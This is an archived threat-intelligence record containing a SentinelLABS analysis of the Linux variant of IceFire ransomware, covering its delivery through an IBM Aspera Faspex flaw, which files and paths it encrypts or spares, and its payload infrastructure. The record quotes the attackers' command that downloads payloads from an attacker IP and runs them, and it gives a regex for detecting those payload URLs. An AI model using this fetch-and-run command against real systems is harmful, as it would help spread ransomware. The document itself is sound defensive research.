{
	"id": "a812d6c9-017a-4c69-8769-df597388d2eb",
	"created_at": "2026-04-10T03:22:03.667755Z",
	"updated_at": "2026-04-10T03:22:19.634397Z",
	"deleted_at": null,
	"sha1_hash": "fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae",
	"title": "IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5667821,
	"plain_text": "IceFire Ransomware Returns | Now Targeting Linux Enterprise\r\nNetworks\r\nBy Alex Delamotte\r\nPublished: 2023-03-09 · Archived: 2026-04-10 02:36:10 UTC\r\nExecutive Summary\r\nIn recent weeks SentinelLABS observed novel Linux versions of IceFire ransomware being deployed within the\r\nenterprise network intrusions of several media and entertainment sector organizations worldwide.\r\nCurrently observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a\r\ndeserialization vulnerability in IBM Aspera Faspex file sharing software.\r\nThe operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their\r\nfocus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who\r\nalso target Linux systems.\r\nBackground\r\nSentinelLABS recently observed a novel Linux version of the IceFire ransomware being deployed in mid February against\r\nenterprise networks. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by\r\nMalwareHunterTeam in March 2022.\r\nPrior to this report, IceFire had only shown a Windows-centric focus. The attackers tactics are consistent with those of the\r\n‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using\r\nnumerous persistence mechanisms, and evading analysis by deleting log files. Previous reports indicate that IceFire targeted\r\ntechnology companies; SentinelLABS observed these recent attacks against organizations in the media and entertainment\r\nsector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus\r\nfor organized ransomware actors.\r\nTechnical Analysis\r\nThe IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary\r\ncompiled with gcc for AMD64 architecture. We tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire\r\nran successfully on both test systems.\r\nIn observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of IBM Aspera\r\nFaspex file server software. The system downloaded two payloads using wget and saves them to /opt/aspera/faspex :\r\nsh -c rm -f demo iFire \u0026\u0026 wget hxxp[://]159.65.217.216:8080/demo \u0026\u0026 wget\r\nhxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire \u0026\u0026 chmod +x demo \u0026\u0026 ./demo\r\nOn execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes\r\nitself by removing the binary, which is evident in the picture below.\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 1 of 5\n\nFiles on the user desktop of a Debian system before and after running IceFire\r\nThe “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.\r\nA file with the CPP extension that was encrypted by IceFire\r\nExcluded Files \u0026 Folders\r\nThe sample contains data segment references to a list of file extensions. These extensions are excluded from encryption, as\r\nthey pertain to executables, application or system functionality. In the case of .txt and .pid, encrypting these files potentially\r\nimpedes the ransomware functionality.\r\n.cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb\r\nThe following file extensions are targeted for encryption:\r\n.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg\r\n.fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow\r\n.rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram\r\n.vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs\r\n.pptx .xls .xlsx\r\nIceFire ransomware doesn’t encrypt all files on Linux: it avoids encrypting certain paths, so that critical parts of the system\r\nare not encrypted and remain operational. In one observed infection, the /srv directory was encrypted, so these exclusions\r\ncan be selectively overridden.\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 2 of 5\n\nFolder Description\r\n/boot Data used at startup\r\n/dev Device files, drivers\r\n/etc System configuration files\r\n/lib Shared libraries used by applications or system for dynamically-linked functionality\r\n/proc\r\nVirtual filesystem used by Linux to store runtime system information like PIDs, mounted drives, system\r\nconfiguration, etc.\r\n/srv Web server directories\r\n/sys Interface to the kernel; similar to /proc\r\n/usr User-level binaries and static data\r\n/var Dynamic data, e.g. caches, databases\r\n/run System information, including PID files; cleared on each reboot\r\nDuring our analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. IceFire targets user\r\nand shared directories (e.g., /mnt , /media , /share ) for encryption; these are unprotected parts of the file system that do\r\nnot require elevated privileges to write or modify.\r\nInterestingly, several file sharing clients downloaded benign encrypted files after IceFire had encrypted the file server’s\r\nshared folders. Despite the attack on the server, clients were still able to download files from the encrypted server. This\r\nimplies the IceFire developer made thoughtful choices in the excluded paths and file extensions.\r\nIceFire Linux Payload Delivery \u0026 Infrastructure\r\nIceFire for Windows is delivered through phishing messages and pivoting using post-exploitation frameworks. The Linux\r\nvariant is in its infancy, though our observations indicate it was deployed using an exploit for CVE-2022-47986, a recently\r\npatched vulnerability in IBM’s Aspera Faspex file sharing software.\r\nIceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:\r\nhxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire\r\nThe following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the Digital Ocean IP\r\naddress in case the actors pivot to a new delivery IP or domain.\r\nhttp:\\/\\/159\\.65\\.217\\.216:8080\\/(([a-z]+\\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\\d|[1-9]|)\\d)\\.?\\b){4})\\/iFire\r\nOpen-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:\r\nOther payload URLs with “aspera” in the secondary hostname section of the URI\r\nSession cookie name: _aspera_faspex_session\r\nService fingerprinting indexed a vulnerable version of Aspera Faspex software\r\nNotable Findings\r\nAs of this writing, the IceFire binary was detected by 0/61 VirusTotal engines. Notably, this sample contains many statically\r\nlinked functions from the legitimate OpenSSL library, contributing to the relatively large file size.\r\nThe binary contains the following hardcoded RSA public key:\r\n-----BEGIN RSA PUBLIC KEY-----\r\nMIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\\nFadq\r\n-----END RSA PUBLIC KEY-----\r\nIn a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named\r\n“Jhone.” The .cnf extension potentially refers to a configuration file. The relic was near the end of the OpenSSL\r\nfunctionality; it is possible that the OpenSSL package contained this artifact and is not necessarily the ransomware\r\ndeveloper.\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 3 of 5\n\nFunction for writing a log file to user Jhone’s Desktop\r\nRansom Notes\r\nIceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file\r\nencryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment\r\nportal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion .\r\nLinux version of IceFire ransom note\r\nThe Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks\r\ntargeting Windows.\r\nIceFire ransom login page\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 4 of 5\n\nIceFire victim leaks page\r\nConclusion\r\nThis evolution for IceFire fortifies that ransomware targeting Linux continues to grow in popularity through 2023. While the\r\ngroundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when illustrious groups added Linux\r\nencryptors to their arsenal, including the likes of  BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others.\r\nIn comparison to Windows, Linux is more difficult to deploy ransomware against–particularly at scale. Many Linux systems\r\nare servers: typical infection vectors like phishing or drive-by download are less effective. To overcome this, actors turn to\r\nexploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through an IBM Aspera\r\nvulnerability.\r\nIndicators of Compromise\r\nSource: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/"
	],
	"report_names": [
		"icefire-ransomware-returns-now-targeting-linux-enterprise-networks"
	],
	"threat_actors": [],
	"ts_created_at": 1775791323,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.pdf",
		"text": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.txt",
		"img": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.jpg"
	}
}